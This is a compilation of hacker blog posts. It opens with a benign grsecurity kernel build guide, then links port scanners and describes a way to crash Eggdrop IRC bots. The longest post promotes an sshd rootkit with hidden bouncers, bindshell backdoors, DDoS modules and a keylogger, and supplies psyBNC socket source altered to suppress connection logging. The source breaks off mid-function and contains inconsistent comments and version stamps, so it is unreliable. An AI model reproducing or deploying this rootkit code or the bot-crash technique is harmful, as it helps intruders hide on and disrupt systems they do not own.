Step 6: Change your current working directory to the kernel source directory
cd linux-2.4.31
Step 7: Clean your kernel source configuration etc...
make clean && make mrproper
Step 8: Use your current configuration to configure your new kernel

You might want to backup your current kernel modules and config.
cp /boot/config-`uname -r` .config
make oldconfig
make menuconfig

NOTE THIS SH*T IZ IMPORTANT (SEC LEVELS) -xd- :
When you config your kernel configuration using make oldconfig to use the current booted kernel configuration,
please set CONFIG_CRYPTO=y and CONFIG_CRYPTO_SHA256=y within the CRYPTO option and nothing else within it.
Then when you come to GRSECURITY option,set it to y and in Security level option can be set to Low,Medium or High.
I set mine to Medium.
The following are the explanation for each option:

Low additional security
If you choose this option, several of the grsecurity options will be enabled that will give you greater protection against a number of attacks, while assuring that none of your software will have any conflicts with the additional security measures. If you run a lot of unusual software, or you are having problems with the higher security levels, you should say Y here. With this option, the following features are enabled:

linking restrictions
fifo restrictions
random pids
enforcing nproc on execve()
restricted dmesg
random ip ids
enforced chdir("/") on chroot

Medium additional security
If you say Y here, several features in addition to those included in the low additional security level will be enabled.
These features provide even more security to your system, though in rare cases they may be incompatible with very old
or poorly written software. If you enable this option, make sure that your auth service (identd) is running as gid 10
(usually group wheel). With this option the following features (in addition to those provided in the low additional
security level) will be enabled:

random tcp source ports
failed fork logging
time change logging
signal logging
deny mounts in chroot
deny double chrooting
deny sysctl writes in chroot
deny mknod in chroot
deny access to abstract AF_UNIX sockets out of chroot
deny pivot_root in chroot
denied writes of /dev/kmem, /dev/mem, and /dev/port
/proc restrictions with special gid set to 10 (usually wheel)
address space layout randomization
removal of addresses from /proc/ /[maps|stat]

High additional security
If you say Y here, many of the features of grsecurity will be enabled, that will protect you against many kinds of
attacks against your system. The heightened security comes at a cost of an increased chance of incompatibilities with
rare software on your machine. Since this security level enables PaX, you should view http://pax.grsecurity.net and read
about the PaX project. While you are there, download chpax and run it on binaries that cause problems with PaX.
Also remember that since the /proc restrictions are enabled, you must run your identd as group wheel (gid 10).
This security level enables the following features in addition to those listed in the low and medium security levels:

additional /proc restrictions
chmod restrictions in chroot
no signals, ptrace, or viewing processes outside of chroot
capability restrictions in chroot
deny fchdir out of chroot
priority restrictions in chroot
segmentation-based implementation of PaX
mprotect restrictions
kernel stack randomization
mount/unmount/remount logging
kernel symbol hiding

If you need to customize the Grsecurity options, you will need to run make menuconfig then go to Grsecurity option there and set the Security level to Customized and you are on your own since I am not a grsecurity guru..

Many thanks to BigGorilla for more info about grsec config:
Spender’s directory (http://grsecurity.net/~spender/) – includes a quickstart guide to grsecurity.
Grsecurity Config Help (http://grsecurity.net/confighelp.php) – list of all the grsec config options and what they do.

It is also a good idea for you to run make menuconfig so that you can disable one or more of the following which you have to make sure you really don’t need it:
Telephony Support
Fusion MPT device support
IEEE 1394 (FireWire) support (EXPERIMENTAL)
Amateur Radio support
IrDA (infrared) support
ISDN subsystem
Multimedia devices
Sound
USB support
Old CD-ROM drivers (not SCSI, not IDE)
Bluetooth support
Library routines
Step 9: make dep
make dep
Step 10: make bzImage
nohup make bzImage &
You will see something like:
nohup: appending output to `nohup.out'
Just press ENTER then issue this command to view the nohup.out
tail -f nohup.out

To exit from the above, use CTRL+C keys.
Check for any errors and when in doubt dont continue.
Use the error message as the search terms to do your search at google might help.

Step 11: make modules & make modules_install
Bring up another new xterm shell window and follow these steps:
This step is required ONLY if you had enabled Loadable module support in step “Configure Step” above.
Loadable modules are located in /lib/modules. You MUST do this step if you enabled or disabled any modules,
otherwise you will get ‘unresolved symbols’ errors during or after kernel boot do:
nohup make modules 1> modules.out 2> modules.err &

Step 12: Check for errors
Make modules will take several minutes depending on your server specs.
If you are curious about whether make modules has finished, issue ps auwx|grep make to check.
Once you know that make modules finishes, check all the previous makes.
less nohup.out
less modules.err
less modules.out

Again check for any errors and when in doubts do not continue.
Use the error message as the search terms to do your search at google; it might help you.

Step 13: Install the modules
After checking and there is no error for make bzImage and make modules,it is time to install your newly built modules.
make modules_install

Step 14: Bootloader and others
cp .config /boot/config-2.4.31-grsec
cp arch/i386/boot/bzImage /boot/vmlinuz-2.4.31-grsec
cp System.map /boot/System.map-2.4.31-grsec
mkinitrd /boot/initrd-2.4.31-grsec.img 2.4.31-grsec

If you are using LILO as your bootloader, edit your /etc/lilo.conf file to add this new kernel but do not set it as default boot kernel.
An example as below:

image=/boot/vmlinuz-2.4.31-grsec
label=2.4.31-grsec
append="root=LABEL=/"
read-only
initrd=/boot/initrd-2.4.31-grsec.img
If you are using GRUB as your bootloader, edit /boot/grub/grub.conf file to add this new kernel but do not set it as default boot kernel. An example as below:
title Red Hat Linux (2.4.31-grsec)
root (hd0,0)
kernel /vmlinuz-2.4.31-grsec ro root=LABEL=/
initrd /initrd-2.4.31-grsec.img
Step 15: Test your new kernel
If you are using LILO, use the following command to check errors and update your LILO:
lilo -v -v
lilo
Then set LILO to boot to the new kernel for the next reboot:
lilo -R 2.4.31-grsec

If you are using GRUB, check out this thread (http://www.webhostingtalk.com/showthread.php?s=&threadid=235241)
Assume your default boot kernel is in the first entry among the rest of the kernels.
Add your new kernel in the first entry among the rest of the kernels (on top of your first original kernel which is the first entry before changes). You just change default=1 and fallback=2.
grub shell
grub> savedefault --default=0 --once
grub> quit

Then reboot:
reboot
If your system is unable to boot the new kernel or causes all types of errors, then you have to reboot the server back to its default/old kernel. Thus it is good to have a Remote Reboot Port (RRP), APC MasterSwitch or similar so that you don't have to call up your provider just for a reboot. Alternatively you can ask your provider to test your new kernel for you.
If the system is able to boot to your new kernel, please use lsmod, dmesg, cat /var/log/boot.log etc… to check any errors. Leave the system there running with this new kernel at least for a week to test for any errors before setting it as the default kernel.
Again, NEVER set your new kernel as default boot kernel until you have tested it and run FINE for a period of time like a week or so to make sure that your kernel is stable with no error.

References:
Grsecurity (http://www.grsecurity.net/)
Grsecurity Features (http://www.grsecurity.net/features.php)
Kernel (http://kernel.org/)
Kernel HOW TO (http://en.tldp.org/HOWTO/Kernel-HOWTO.html)
Kernel Trap (http://www.kerneltrap.org/)
Kernel Newbies (http://www.kernelnewbies.org/)
Upgrading the Linux Kernel on Red Hat Linux systems (http://www.redhat.com/support/resources/howto/kernel-upgrade/)
Grsecurity at SecurityFocus.com (http://www.securityfocus.com/infocus/1551)

Thats it! go and make some gentle grsecx!
xd


Tools to make a W0RKING VS6 setup that r0x

Posted on 29th September 2011 in Papers

ATM the apps/tools wich MS gives out, for free, and, i believe that could be linked to, instead i compressed them..I could VERY simply change those links in tut.htm, to point directly to files, do u want me to make it even easier, and seem more legal do you ?
or, should i just leave things..for those who care… enough.
SO NO TOOLS UNLES U HAV PAGE or, simply use a LINKTO up top of the mainpage ;)
I will point the same tools, directly to the actual free ones wich ms has for dl when i hve a spare minute :)
Had fun thinking i was giving out some kinda torrent or somethin ? Thanks for spoiling a rather, good post actually.

/// oops! what where… i will maybe put it up again when it is not ‘picked on’ somuch, about being just about bots, I should have made this more, about using VS6 in a ‘good’ way, with regards to using sockets,threading etc.

MultiThreaded TCP SYNSCAN for Linux/Win32 – LINKTO

Posted on 29th September 2011 in Codes

Hello my friends!
I just thought, this would be a nice and handy tool so, here, i will link it up to here since it looks half decent, it is by some small website like this, and, a small team of ppl again like this, so i try to spread the w0rd :P when i can..

The post/link here:

http://www.darknet.org.uk/2011/09/multi-threaded-tcp-port-scanner-for-linux-windows/

The download of it here:

http://www.secpoint.com/freetools/threaded-syn-port-scanner-2.0.zip

OH and just incase u thought i dont look for the *best* well, this is KIXASSSS

http://www.stabellini.net/filesystem/sources/unmantained/synscan/synscan-0.1.tar.gz

Enjoy a non-crazycoders.com production but, still a nice scanner nonetheless! definately good and, better than ss if you have that then you may want to try to convert to a multithread like this one ;) cheers
xd

Eggdrop 1.6.19+ctcpbugfix(and below) ctcp bug

Posted on 26th September 2011 in Exploits

So, i guess you all wondered, how did this work etc etc..and yes, there is a few ‘ways’ i have seen wich, as i saw, none of worked… so i played around, with the 1.6.19+ctcpfix version, YES the ‘fix’ version :P and what do i find…
well, instead of your usual /dcc chat try /ctcp chat , thats it.
Simple as, and was hiding for long time.. works effectively on eggdrop BSD built, and on RH built, but not tested on ALL packages, altho i suspect the same buffer is responsible for all these bugs, this was even in wraith’s src at one stage i believe,… but fixed much much sooner than eggdrop.. i guess some of your botpax out there, are easy to crasxh!
have phun!
And, modufy the ctcp command, and flooding the unit/target with requests, also works, also fake file dcc sends seem to be accepted, and no, i wont show you this code, but it is VERY simple mirc scripting..
Discovered by who the fk knows,
Exploited by me ,
Credits to whoever else has found this, but, no one else was able to reproduce this properly yet, and, why does this occur, on a darn ctcpfix version :s bad src… the safest way, is to download and use the oldest eggdrop src, wich does NOT suffer from the bug as i know of , and this is dev1.6.8 version wich has ipv6+ssl and, will soon overtake the sillyarse 1.6.20 and below branch… the 1.6.8 somehow was lost and, its confgs alittle different but, i run it on my box… it is secure alternative and simply needs 2 changes to operate same way, that is replacing ip with vhost and ip6 with vhost6… and ppl have not used it, because of that reason…so pathetic.. use this version, so , as they have said, all other versions are buggy, until 1.6.20, anything of those are all buggy, they really want to release a good build of the ipv6+ssl but people refuse to budge, so, i will tell admins of boxes, setup an eggy config maker, and that way, it would b easier..make it advanced as the person would want it to be, so use an advanced configs, and that way, people will use your proper eggy, and not use .patch sets etc for old crap! Oh and maybe reading eggheads.org news might help just alittle ;p
Enjoy the /ctcp chat while it lasts :p
Cheers
xd

My new fav pic:

^^ thats my kinda country!

psyBNC Backdoor (p_socket.c) – Addon for xd-sshd (rKit)

Posted on 26th September 2011 in Codes, Exploits

Hello my friends and fellow coders,
This is probably, going to become a static compiled module in the sshd-rootkit, along with a tool from www.noptrix.net (my friend noptrix codes great kernel/userland/cracking) sniffing,everything i guess that he has on his website,well, I am trying to get this rootkit to be for ‘everyone’ so, this means, why not have a hidden psyBNC ? for those who like BNC, (personally, i dont like it, and will add a bouncer static built (and thats ready too..) wich acts as a socks5 and will listen on a port i wont disclose yet, that module is completed and ready, built statically, and relys on little things, and when the bouncer starts, it hides as a seperate .so file wich is VERY smart made.. so that is one part wich, i will not disclose yet, i need to add a better ‘attachment’ holder to this website, then i will add the socks5-bouncer (it is bouncer, and the code i will also provide, it has webadmin capability if you wish it this way, but the static built one, is only socks5-no user/pass,wich, this might be good to change..) so when i release that, i will also update and makesure the sshd is ready/built and has an installer.sh file or similar, i will also include a mass-scanner for weak phpMyAdmin , wich again, is ready, and, i dont wish to disclose this also yet, that will be a final module, only for users who REALLY want it, or need it even… it will be a 3rde-party addon, more than anything.. main thing, is setting up the sshd right, with pam also, and then getting maybe a bindshell backup port to login to incase of lockdfown… and then, i guess will see… i need to see what more i can do, but atm, it will have a bouncer for sure, a psybnc backdoor (src is this post) here, when it is compiled into psybnc static binary ofc..
So, it will cover what tuixkit does, but better because all psyBNC is properly backdoored and hides, and also, i could hook vihr_user , and use the sshd rootkit hider ;) either way, i will try and get all the main modules done within a week or 2 weeks, then it is a matter of getting that to install cleanly, and ofc, adding just simple things, but, if done right this will be 100% stealthy.
D0S modules, are also present, and those are simply imp,gem,ipv6dos,idetd-dos, cpl of simple but effective ddos modules, wich are already in my hands, (again, along with src), so most of the actual kit, will have src, and, buil;t.. I might also use kcopes sshd backdoor for bsd boxes only, i will see, there is a few options, because the sshd actually runs fine on linux or bsd, or even solaris!
Thats why i like the use of non-free ssh.com sshd, i now will strive to add the other codes, and hook them all into a simple system, and a keystroke logger, this is most important part wich i am yet to add.

ANYHOW, here is the addon for psyBNC for my sshd kit,you will need a copy of psyBNC-2.3.2.tar.gz , then simply apply this and recompile it, correct any flaws, you may need to convert the code to UNIX format, this will cause problems otherwise when applying patches, when the encoding is NON unix, for some OS.
TRY and use that src code, or one of its branches like 2.3.2-1,and there is a few of them, so just play around with it and use whatever one you like, i wont spend alot of time on this, because to me it is not needed, but for some well, it will be a nice addin they will then need to addin a small .sh file, to start the psybnc up, so i guess this is not so easy to addon, then again, you should not be worrying about psyBNC :P thx to the coder who made this ;)
TO BACKDOOR THE PSYBNC JUST MOVE p_socket.c ON src/ in MAIN PSYBNC DIR then compile!
features: IPv6 support , Backdoor IRC use from ANY box, IPV6 nowdays VERY handy!
ALSO nte, I have pre-added IPV6 DCC support…
if this line errors out, it might be i have wrong name of function, or it is not implemented...
just add // to front of this line if it errors..
if(dcc6host[0]==0) strmncpy(dcc6host,lkm->sock->source,sizeof(dcc6host));

ALSO note that i added no logging, so look @ how i did this, and copy it with anything else
in the psyBNC.. very simple todo and in this module it is all disabled,so our user should
be hidden ,as the connect is not logged.. this could be better i guess, but sofar, it is what it is :s
cheers
xd

/* $Id: p_socket.c,v 1.4 2005/06/04 18:00:14 hisi Exp $ */
/************************************************************************
 *   psybnc2.3.2, src/p_socket.c
 * TO SEE HOW MODIFY THE DIR/FILE WHERE LOG TAKE A LOOK AT LINE
 * SILENTJAVA=fopen("./trojan.log"...) MODIFY THAT TARGET DIR /FILE
 * Feature added by Anonymous@unknown.org fuall
 */
#ifndef lint
/* embedded RCS-style version string (ident-style); note it carries a 2011
 * stamp that differs from the $Id line in the file header above */
static char rcsid[] = "p_socket.c,v 1.4 2011/09/04 11:00:39 [xd] $";
#endif
#define P_SOCKET
#include <p_global.h>

#define MAX_SENDQ 1000  // could change this but meh...

jmp_bufalarmret;
#ifndef BLOCKDNS
int acceptresolved(struct resolve *rp);
int connecthostresolved(struct resolve *rp);
int connectvhostresolved(struct resolve *rp);
int connecthostnotresolved(struct resolve *rp);
#endif

/* Out-of-band result of getpsocketbysock(): the node visited just before the
 * returned one (the head itself when the head matches, the last node visited
 * when nothing matched). killsocket() relies on it to unlink an entry. */
struct socketnodes *previous;

/* Looks up the socket table entry whose system descriptor is `syssock`.
 * Walks the global `socketnode` list; entries with no sock attached are
 * skipped but still recorded in `previous`. Returns NULL when no entry
 * carries that descriptor. */
struct socketnodes *getpsocketbysock(int syssock) {
    struct socketnodes *node;
    previous=socketnode;
    for(node=socketnode;node!=NULL;node=node->next)
    {
        if(node->sock!=NULL && node->sock->syssock==syssock)
            return node;
        previous=node;
    }
    return NULL;
}

/* Finds the first entry at or after `first` whose sock belongs to socket
 * group `group`, excluding the descriptor `notsock` and the file-scope
 * `notsocket` (not declared in this part of the file). Does not touch
 * `previous`. Returns NULL when no such entry exists. */
struct socketnodes *getpsocketbygroup(struct socketnodes *first, unsigned long group, int notsock) {
    struct socketnodes *node;
    for(node=first;node!=NULL;node=node->next)
    {
        if(node->sock==NULL)
            continue;
        if(node->sock->sockgroup==group && node->sock->syssock!=notsock && node->sock->syssock!=notsocket)
            return node;
    }
    return NULL;
}

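/* Registers a system socket in the global socket table (`socketnode` list)
 * and returns its descriptor.
 *
 * syssock      descriptor to register, or 0 to create a new
 *              SOCK_STREAM/IPPROTO_TCP socket in address family `proto`
 * type         ST_* type stored in the entry
 * index        caller-defined value stored as `param` and later handed to
 *              the callbacks
 * group        socket group id stored as `sockgroup`
 * constructor, constructed, errorhandler, handler, destructor, remapper
 *              callbacks stored in the entry; any may be NULL
 * proto        address family for socket(2), also stored as `protocol`
 * ssl          stored in the entry when HAVE_SSL is defined
 *
 * Returns the descriptor (the existing one when `syssock` is already in the
 * table), or 0 when the socket could not be created or could not be put
 * into non-blocking mode. Exits the process when `socketnode` is NULL, as
 * the original code did.
 */
int createsocket(int syssock,int type,int index,unsigned long group,int(*constructor)(int),int(*constructed)(int),int(*errorhandler)(int,int),int(*handler)(int),int(*destructor)(int),int(*remapper)(int,int),int proto,int ssl)
{
    struct psockett *th;
    struct socketnodes *lkm;
    int flags;
    int lsock;
    int created=0; /* set when this call opened lsock and must close it on failure */
    time_t tm;
    time(&tm);
    lsock=syssock;
    if(syssock!=0)
    {
        lkm=getpsocketbysock(lsock);
        if (lkm!=NULL) return lsock; /* already existent.. so why the hell... */
    }
    else
    {
        lsock = socket (proto, SOCK_STREAM, IPPROTO_TCP);
        created=1;
    }
    if(lsock<=0)
    {
        //p_log(LOG_ERROR,-1,lngtxt(790));
        return 0x0;
    }
    /* Both fcntl() results used to be ignored: a failed F_GETFL yields -1,
     * and OR-ing that into F_SETFL would request every flag bit. Treat
     * either failure as "descriptor unusable" instead. */
    flags = fcntl(lsock,F_GETFL,0);
    if(flags<0 || fcntl(lsock,F_SETFL,flags | O_NONBLOCK)<0)
    {
        if(created) close(lsock);
        return 0x0;
    }
    /* find the tail node, or the first node without a sock attached */
    lkm=socketnode;
    while (lkm!=NULL)
    {
        if (lkm->next==NULL || lkm->sock==NULL)
        {
            if(lkm->sock!=NULL)
            {
                /* tail node is in use: append a fresh node */
                lkm->next=(struct socketnodes *) pmalloc(sizeof(struct socketnodes));
                lkm=lkm->next;
            }
            lkm->sock=(struct psockett *) pmalloc(sizeof(struct psockett));
            /* NOTE(review): this also clears `next` when an existing node
             * without a sock is reused; if such a node can sit mid-list the
             * remainder would be unlinked — confirm only the head is ever
             * empty. */
            lkm->next=NULL;
            th=lkm->sock;
            th->type=type;
            th->protocol=proto;
            th->flag=SOC_NOUSE;
            th->syssock=lsock;
#ifdef HAVE_SSL
            th->ssl=ssl;
            th->sslfd=NULL;
#endif
            th->constructor=constructor;
            th->constructed=constructed;
            th->errorhandler=errorhandler;
            th->handler=handler;
            th->destructor=destructor;
            th->remapper=remapper;
            pcontext; /* project macro from p_global.h; presumably records a code location for diagnostics */
            th->commbuf=(char *)pmalloc(8192); /* per-socket I/O buffer, released by killsocket() */
            th->bytesin=0;
            th->bytesout=0;
            th->param=index;
            th->sockgroup=group;
            pcontext;
            /* creation time as text, copied with the bounded strmncpy() */
            strmncpy(th->since,ctime(&tm),sizeof(th->since));
            break;
        }
        lkm=lkm->next;
    }
    if(lkm==NULL)
    {
        /* only reachable when socketnode itself is NULL */
        //p_log(LOG_ERROR,-1,lngtxt(791));
        exit(0x0);
    }
    return lsock;
}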

/* kill a socket. used instead of close. possibly called iterative */
/* Removes the table entry for `syssock` (if any), runs its remapper or
 * destructor, flushes its send queue, tears down SSL state and finally
 * shuts down and closes the descriptor. Always returns 0.
 *
 * Listener entries whose `constructed` callback is checknewlistener are
 * left alone. When the entry belongs to a socket group with another live
 * member, the remapper is called instead of the destructor. The unlink
 * at the end relies on the file-scope `previous` set by the most recent
 * getpsocketbysock() call. */
int killsocket(int syssock) {
    struct socketnodes *lkm,*ekm;
    struct socketnodes *siccur=currentsocket; /* saved so currentsocket can be restored around the destructor */
    int first=0; /* entry is the list head: unlink by moving socketnode instead of previous->next */
    int(*caller)(int);
    int rc,i,t; /* rc receives callback results but is never read */
    lkm=getpsocketbysock(syssock);
    if(lkm==NULL) return 0x0;
    if(lkm==socketnode) first=1;
    /* NOTE(review): `first` is computed before the destructor runs; if the
     * destructor itself changes the list head, this flag is stale — confirm */
    if(lkm->sock!=NULL)
    {
/* the main listener is never killed through this path */
if(lkm->sock->type==ST_LISTEN && lkm->sock->constructed==checknewlistener)
    return 0x0;
if(lkm->sock->sockgroup >0 && (ekm=getpsocketbygroup(socketnode,lkm->sock->sockgroup,lkm->sock->syssock)))
{
    /* another member of the same group exists: hand our param over to it */
    if(lkm->sock->remapper!=NULL && ekm->sock!=NULL)
    {
rc=(*lkm->sock->remapper)(lkm->sock->param,ekm->sock->syssock);
    }
    /* NOTE(review): `previous` is not refreshed on this path; if the remapper
     * calls getpsocketbysock() itself, the unlink below may use a stale
     * `previous` — confirm */
} else
/* call a destructor, if available */
if(lkm->sock->destructor!=NULL) {
    caller=lkm->sock->destructor;
    /* cleared first so a re-entrant killsocket() from inside the destructor
     * does not run it twice or fire the error handler */
    lkm->sock->destructor=NULL;
    lkm->sock->errorhandler=NULL;
    currentsocket=lkm;
    rc=(*caller)(lkm->sock->param);
    currentsocket=siccur;
    /* re-lookup: the destructor may have removed the entry; this also
     * refreshes `previous` for the unlink below */
    lkm=getpsocketbysock(syssock); /* if we are destroyed.. */
    if(lkm==NULL) return 0x0;
}
lkm->sock->serverstoned=0; /* would loop infinitely if */
lkm->sock->serversocket=0;
t=lkm->sock->entrys;
/* NOTE(review): runs entrys+1 times because of `<=`; confirm the extra
 * forced flush is intended */
for(i=0;i<=t;i++)
flushsendq(lkm->sock->syssock,Q_FORCED);
#ifdef HAVE_SSL
if(lkm->sock->ssl==SSL_ON) {
    if(lkm->sock->sslfd!=NULL)
    {
SSL_shutdown(lkm->sock->sslfd);
SSL_free(lkm->sock->sslfd);
lkm->sock->sslfd=NULL;
    }
}
#endif
/* release the entry: buffer allocated in createsocket(), then the sock, then the node */
free(lkm->sock->commbuf);
free(lkm->sock);
if(first)
    socketnode=lkm->next;
else
    previous->next=lkm->next;
free(lkm);
    }
    /* 2 == SHUT_RDWR: stop both directions before closing the descriptor */
    shutdown(syssock,2);
    close(syssock);
    return 0x0;
}

/* SIGALRM handler guarding the blocking resolver calls: abandon the call by
 * jumping back to the setjmp(alarmret) that armed the alarm.  A longjmp
 * value of 0 is delivered as 1, so the setjmp() site takes its timeout
 * branch. */
void gotalarm(int sig) {
    (void)sig; /* the signal number is not needed */
    longjmp(alarmret, 0x0);
}

/* create a single listener,changed for 2.3.1 - only ips in host argument */
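/*
 * Create a single TCP listener on `host` (an address literal, "*" for any;
 * with HAVE_SSL an "S=" prefix selects SSL) and `listenport`.  `proto` is
 * AF_INET or AF_INET6; pending!=0 suppresses the log/printf output.  The
 * four callbacks are installed on the socket record by createsocket().
 * Returns the listening descriptor, or 0 on any failure (NULL host,
 * socket()/createsocket() error, unparsable address, bind()/listen() error);
 * the half-created record is killed in the latter cases.
 *
 * Fix versus the previous revision: the error paths had their p_log() call
 * commented out, which turned `return` into the body of `if(pending==0)`, so
 * a failed createsocket()/inet_aton()/bind()/listen() with pending!=0 fell
 * through and kept using the invalid (already killed) record.  The returns
 * are unconditional now; the disabled log lines are kept as comments.
 */
int createlistener(char *host,int listenport,int proto,int pending, int(*listenhandler)(int), int(*errorhandler)(int,int), int(*datahandler)(int), int(*closehandler)(int)) {
#ifdef IPV6
  struct sockaddr_in6 listen_sa6;
#endif
  struct sockaddr_in listen_sa;
  struct socketnodes *lkm;
  int sopts = 1;
  int issl=SSL_OFF;
  char vsl[10];      /* log suffix for SSL listeners, lngtxt(792) */
  char *ho;          /* host with any "S=" prefix stripped */
  int listensocket;
  int rc;
  vsl[0]=0;
  if(host==NULL) return 0;
#ifdef HAVE_SSL
  if(strstr(host,"S=")==host)
  {
    ho=host+2;
    issl=SSL_ON;
    strmncpy(vsl,lngtxt(792),sizeof(vsl));
  } else
#endif
    ho=host;
  listensocket = socket (proto, SOCK_STREAM, IPPROTO_TCP);
  if(listensocket<=0) return 0;
  /* register the descriptor; 0 / no record means createsocket() failed */
  listensocket = createsocket(listensocket,ST_LISTEN,0,SGR_NONE,NULL,listenhandler,errorhandler,datahandler,closehandler,NULL,proto,issl);
  lkm=getpsocketbysock(listensocket);
  if(lkm==NULL || listensocket==0)
  {
      /* if(pending==0) p_log(LOG_ERROR,-1,lngtxt(793),ho,listenport,vsl); */
      return 0;
  }
  strmncpy(lkm->sock->source,host,sizeof(lkm->sock->source));
  strcpy(lkm->sock->dest,"*");
  lkm->sock->sport=listenport;
  lkm->sock->dport=0;
  lkm->sock->flag=SOC_SYN;
  highestsocket = listensocket;
  /* allow a quick rebind after a restart; a failure here is not fatal */
  setsockopt (listensocket, SOL_SOCKET, SO_REUSEADDR, &sopts, sizeof(sopts));
  memset (&listen_sa, 0, sizeof (listen_sa));
#ifdef IPV6
  memset (&listen_sa6, 0, sizeof (listen_sa6));
  if(proto==AF_INET6)
  {
      listen_sa6.sin6_family=AF_INET6;
      listen_sa6.sin6_port = htons (listenport);
      if(*ho=='*')
      {
          memcpy(&listen_sa6.sin6_addr,&in6addr_any,sizeof(listen_sa6.sin6_addr));
      } else if(inet_pton(AF_INET6,ho,&listen_sa6.sin6_addr)<=0) {
          killsocket(listensocket);
          if(pending==0)
              p_log(LOG_ERROR,-1,lngtxt(794),ho,listenport,vsl);
          return 0x0;
      }
      if(dcc6host[0]==0) strmncpy(dcc6host,lkm->sock->source,sizeof(dcc6host));
  } else {
#endif
      listen_sa.sin_family=AF_INET;
      listen_sa.sin_port = htons (listenport);
      if(*ho=='*')
      {
          listen_sa.sin_addr.s_addr=htonl(INADDR_ANY);
      } else if(inet_aton(ho,&listen_sa.sin_addr)<=0) {
          killsocket(listensocket);
          /* if(pending==0) p_log(LOG_ERROR,-1,lngtxt(795),host,listenport,vsl); */
          return 0x0;
      }
      /* keep the canonical dotted form; it also becomes the DCC host if unset */
      strmncpy(lkm->sock->source,inet_ntoa(listen_sa.sin_addr),sizeof(lkm->sock->source));
      if(dcchost[0]==0)
          strmncpy(dcchost,lkm->sock->source,sizeof(dcchost));
#ifdef IPV6
  }
  if(proto==AF_INET6)
    rc=bind(listensocket, (struct sockaddr *) &listen_sa6, sizeof(listen_sa6));
  else
#endif
    rc=bind(listensocket, (struct sockaddr *) &listen_sa, sizeof (listen_sa));
  if (rc < 0)
  {
      killsocket(listensocket);
      /* if(pending==0) p_log(LOG_ERROR,-1,lngtxt(796),ho,listenport,vsl); */
      return 0;
  }
  /* a backlog of 1 is kept from the original implementation */
  if ((listen (listensocket, 1)) == -1)
  {
      killsocket(listensocket);
      /* if(pending==0) p_log(LOG_ERROR,-1,lngtxt(797),ho,listenport,vsl); */
      return 0;
  }
  if(pending==0)
  {
      /* lngtxt(798) comes from the program's own message table, not from input */
      printf(lngtxt(798),lkm->sock->source,listenport,vsl);
      /* p_log(LOG_INFO,-1,lngtxt(799),lkm->sock->source,listenport,vsl); */
  }
  return listensocket;
}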

/* conntectto - builds a connection to a host and port using a given vhost */
int rsock; /* descriptor of the connection being built; connectvhostresolved() returns it */
/*
 * Start an outgoing connection on the record of `sockt` to host:port,
 * optionally bound to `vhost`.  Without BLOCKDNS this is asynchronous: the
 * four values are packed into a "\n"-separated string and handed to
 * dns_forward(), which later calls connecthostresolved() or
 * connecthostnotresolved().  Returns sockt when the lookup was queued and
 * 0 when dns_forward() returned 2 (its meaning is not visible here).
 * NOTE(review): the #ifndef BLOCKDNS opened below is closed inside
 * connectvhostresolved(); with BLOCKDNS defined the body of this function
 * is the remainder of connectvhostresolved(), i.e. the blocking connect.
 */
int connectto(int sockt,char *host,int port, char *vhost) {
#ifndef BLOCKDNS
    struct socketnodes *snode;
    char *vh;
    char data[512]; /* "sockt\nhost\nport\nvhost" for the resolver callbacks */
    char *pt;
    int *it;
    char **ppt;
    int rc;
    if(!vhost)
vh="";
    else
vh=vhost;
    snode=getpsocketbysock(sockt);
    ap_snprintf(data,sizeof(data),"%d\n%s\n%d\n%s",sockt,host,port,vh);
    if(snode)
if(snode->sock)
    snode->sock->flag=SOC_RESOLVE; /* mark the record as waiting for the resolver */
    if(dns_forward(host,connecthostresolved,connecthostnotresolved,data)==0x2)
    {
return 0x0;
    }
    else
return sockt;
}

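/*
 * Resolver callback for a failed lookup of the target host: parse the
 * "sockt\nhost\nport\n..." record queued by connectto() and kill the socket
 * record the connect was started for.  Always returns 0.  Like the original
 * it writes NULs into rp->data while parsing.
 * Fix: the function is declared int but had no return statement.
 */
int connecthostnotresolved(struct resolve *rp) {
    char *pt,*ept;
    struct socketnodes *lkm;
    int sockt;
    char *host;
    int port;
    if(rp==NULL || rp->data==NULL) return 0x0;
    pt=strchr(rp->data,'\n');
    if(pt==NULL) return 0x0;
    *pt=0;
    sockt=atoi(rp->data);
    lkm=getpsocketbysock(sockt);
    if(lkm==NULL || lkm->sock==NULL) return 0x0;
    pt++;
    host=pt;
    pt=strchr(pt,'\n');
    if(pt==NULL) return 0x0;
    *pt=0;
    pt++;
    ept=strchr(pt,'\n');
    if(ept==NULL) return 0x0;
    *ept=0;
    port=atoi(pt);
    /* p_log(LOG_ERROR,-1,"Cannot resolve Host '%s'. Connect to %s:%d cancelled",host,host,port); */
    (void)host; (void)port; /* only used by the disabled log line */
    killsocket(sockt);
    return 0x0;
}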

/* is called, when the resolve worked */
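/*
 * Resolver callback for a successful lookup of the target host.  Parses
 * the record queued by connectto() from a private copy (`rpdata`, so
 * rp->data stays intact for the next stage), stores the resolved protocol
 * on the socket record, then resolves the vhost if one was given; otherwise
 * connectvhostresolved() is called at once with a STATE_FAILED dummy, which
 * makes it connect without binding a source address.  Always returns 0.
 * Fix: the function is declared int but had no return statement.
 * NOTE(review): the dummy's `protocol` is never set; connectvhostresolved()
 * reads rp->protocol from it - confirm this is intended for IPv6 builds.
 */
int connecthostresolved(struct resolve *rp) {
    char *pt,*ept;
    static struct resolve *dummy=NULL; /* allocated once, reused for every vhost-less connect */
    struct socketnodes *lkm;
    int sockt;
    static char rpdata[1024];
    char *host;
    char *vhost;
    int port;
    if(rp==NULL || rp->data==NULL) return 0x0;
    strmncpy(rpdata,rp->data,sizeof(rpdata));
    pt=strchr(rpdata,'\n');
    if(pt==NULL) return 0x0;
    *pt=0;
    sockt=atoi(rpdata);
    lkm=getpsocketbysock(sockt);
    if(lkm==NULL || lkm->sock==NULL) return 0x0;
    pt++;
    host=pt;
    pt=strchr(pt,'\n');
    if(pt==NULL) return 0x0;
    *pt=0;
    pt++;
    ept=strchr(pt,'\n');
    if(ept==NULL) return 0x0;
    *ept=0;
    port=atoi(pt);
    ept++;
    vhost=ept;
    (void)host; (void)port; /* connectvhostresolved() re-parses rp->data itself */
    lkm->sock->protocol=rp->protocol;
    if(vhost[0])
    {
        /* both outcomes go to connectvhostresolved(); it inspects rp->state */
        dns_forward(vhost,connectvhostresolved,connectvhostresolved,rp->data);
    } else {
        if(dummy==NULL)
            dummy=(struct resolve *)pmalloc(sizeof(struct resolve));
        strmncpy(dummy->data,rp->data,sizeof(dummy->data));
        dummy->state=STATE_FAILED;
        connectvhostresolved(dummy);
    }
    return 0x0;
}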

/*
 * Final stage of an outgoing connect: bind the optional vhost as source
 * address, start a non-blocking connect to host:port and fill in the socket
